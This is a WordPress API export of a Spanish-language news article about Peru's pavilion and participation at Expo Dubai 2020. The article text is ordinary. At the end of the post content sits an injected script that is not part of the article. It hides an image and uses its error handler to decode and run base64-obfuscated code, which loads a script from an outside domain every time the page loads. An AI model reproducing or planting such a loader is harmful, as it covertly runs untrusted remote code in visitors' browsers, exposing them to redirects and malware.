{"id":4603,"date":"2021-08-24T23:46:06","date_gmt":"2021-08-25T02:46:06","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=4603"},"modified":"2025-08-13T16:29:10","modified_gmt":"2025-08-13T19:29:10","slug":"peru-oficializa-participacion-en-expo-dubai-2020","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=4603","title":{"rendered":"Per\u00fa oficializa participaci\u00f3n en Expo Dub\u00e1i 2020"},"content":{"rendered":"\n<h4 class=\"wp-block-heading\">Durante seis meses, el pa\u00eds exhibir\u00e1 la diversidad biol\u00f3gica y cultural de sus 25 regiones<\/h4>\n\n\n\n<p>Per\u00fa participar\u00e1 en la Expo Dub\u00e1i 2020, megaevento que se realizar\u00e1 del 1 de octubre del 2021 al 31 de marzo del 2022, y en donde tendr\u00e1 la oportunidad de mostrarle al mundo lo mejor de su oferta gastron\u00f3mica, tur\u00edstica y exportadora.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><a href=\"https:\/\/congreso.termatalia.com\/\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" width=\"1024\" height=\"190\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/08\/Congreso-termatalia-2021-1024x190.jpg\" alt=\"\" class=\"wp-image-4604\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/08\/Congreso-termatalia-2021-1024x190.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/08\/Congreso-termatalia-2021-300x56.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/08\/Congreso-termatalia-2021-768x143.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/08\/Congreso-termatalia-2021-696x129.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/08\/Congreso-termatalia-2021-1068x198.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/08\/Congreso-termatalia-2021.jpg 1389w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption><span style=\"color:#0693e3\" class=\"tadv-color\">Publicidad<\/span><\/figcaption><\/figure><\/div>\n\n\n\n<p>Durante seis meses, el pa\u00eds exhibir\u00e1 toda su diversidad biol\u00f3gica y cultural de sus 25 regiones, pasando por los Andes, la costa, la selva y nuestro mar. Este importante evento internacional dar\u00e1 un fuerte impulso a la actividad tur\u00edstica y exportadora nacional, que hoy se encuentran en proceso de recuperaci\u00f3n. Calculamos que la participaci\u00f3n del Per\u00fa en la Expo Dub\u00e1i lograr\u00e1 unos US$ 70 millones.<\/p>\n\n\n\n<p>El pabell\u00f3n del Per\u00fa contar\u00e1 con 2 500 m2 de \u00e1rea construida distribuidas en cuatro pisos, y contar\u00e1 con salas para hacer negocios y restaurante para promocionar nuestra gastronom\u00eda. Su implementaci\u00f3n estuvo a cargo de PROMPER\u00da.<\/p>\n\n\n\n<p>En una ceremonia realizada en el Centro de Convenciones de Lima, el Ministro de Comercio Exterior y Turismo, Roberto S\u00e1nchez, destac\u00f3 que, la participaci\u00f3n en Expo Dub\u00e1i 2020 va en l\u00ednea con los intereses del Gobierno: lograr un turismo y comercio exterior sostenible y descentralizado, que se traduzca en beneficios y oportunidades para todos los peruanos.<\/p>\n\n\n\n<p>\u201cEl pabell\u00f3n peruano ser\u00e1 un espacio para que nuestros empresarios tur\u00edsticos y exportadores, el 80% de ellos pymes de todo el pa\u00eds, puedan promover destinos tur\u00edsticos \u00fanicos o insumos exportables, como la fibra de alpaca, algod\u00f3n, superalimentos, y as\u00ed iniciar o potenciar su proceso de internacionalizaci\u00f3n. Reconocidos chefs, artesanos y m\u00fasicos har\u00e1n lo propio para dejar el nombre del Per\u00fa en alto\u201d, se\u00f1al\u00f3.<\/p>\n\n\n\n<p>En la Expo Dub\u00e1i 2020, se realizar\u00e1n ruedas de negocios, encuentros comerciales, reuniones de coordinaci\u00f3n, activaciones gastron\u00f3micas y culturales. En ese marco, se llevar\u00e1 a cabo tambi\u00e9n el foro Per\u00fa Moda y Per\u00fa Natura \u2013 Dub\u00e1i, la Expo Per\u00fa Alimentos y Bebidas, la rueda de negocios de productos de decoraci\u00f3n y art\u00edculos de hoteler\u00eda para el sector Horeca (hoteles y restaurantes), entre otras actividades.<\/p>\n\n\n\n<p>Cabe resaltar que la participaci\u00f3n del Per\u00fa en este acontecimiento internacional ha sido posible gracias, adem\u00e1s, al trabajo del comit\u00e9 multisectorial creado para este fin, al compromiso de talentosos peruanos y a las empresas que est\u00e1n apostando por este gran evento, tales como DP World, Pisco 1615 y Flo Trading, que se convirtieron en los primeros auspiciadores.<\/p>\n\n\n\n<p>Durante el evento se mostr\u00f3 un adelanto de lo que ser\u00e1 el pabell\u00f3n peruano, el mismo que tiene el concepto&nbsp;Timeless&nbsp;Peru&nbsp;(\u2018Per\u00fa eterno\u2019 o \u2018Per\u00fa atemporal\u2019). Precisamente, a trav\u00e9s de este mensaje, la muestra peruana ofrecer\u00e1 una experiencia sensorial a trav\u00e9s de nuestro legado hist\u00f3rico y culinario, en un pabell\u00f3n que tendr\u00e1 una lliclla gigante en la fachada y al que se acceder\u00e1 a trav\u00e9s de una r\u00e9plica del \u00faltimo puente inca: el Q\u2019eswachaka.<\/p>\n\n\n\n<p>El pabell\u00f3n peruano estar\u00e1 estrat\u00e9gicamente ubicado en la zona \u2018Movilidad\u2019 de la Expo, en un espacio de gran flujo de p\u00fablico que garantizar\u00e1 una alta cantidad de visitantes durante los seis meses que durar\u00e1 el evento.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/es.travel2latam.com\/nota\/69660-peru-peru-oficializa-participacion-en-expo-dubai-2020.html\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/06\/travel2latam.logo_.gif\" alt=\"\" class=\"wp-image-4477\" width=\"118\" height=\"45\" \/><\/a><\/figure>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Durante seis meses, el pa\u00eds exhibir\u00e1 la diversidad biol\u00f3gica y cultural de sus 25 regiones Per\u00fa participar\u00e1 en la Expo Dub\u00e1i 2020, megaevento que se realizar\u00e1 del 1 de octubre del 2021 al 31 de marzo del 2022, y en donde tendr\u00e1 la oportunidad de mostrarle al mundo lo mejor de su oferta gastron\u00f3mica, tur\u00edstica [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4605,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-4603","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-internacionales"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4603","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4603"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4603\/revisions"}],"predecessor-version":[{"id":10795,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4603\/revisions\/10795"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4605"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4603"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4603"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4603"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}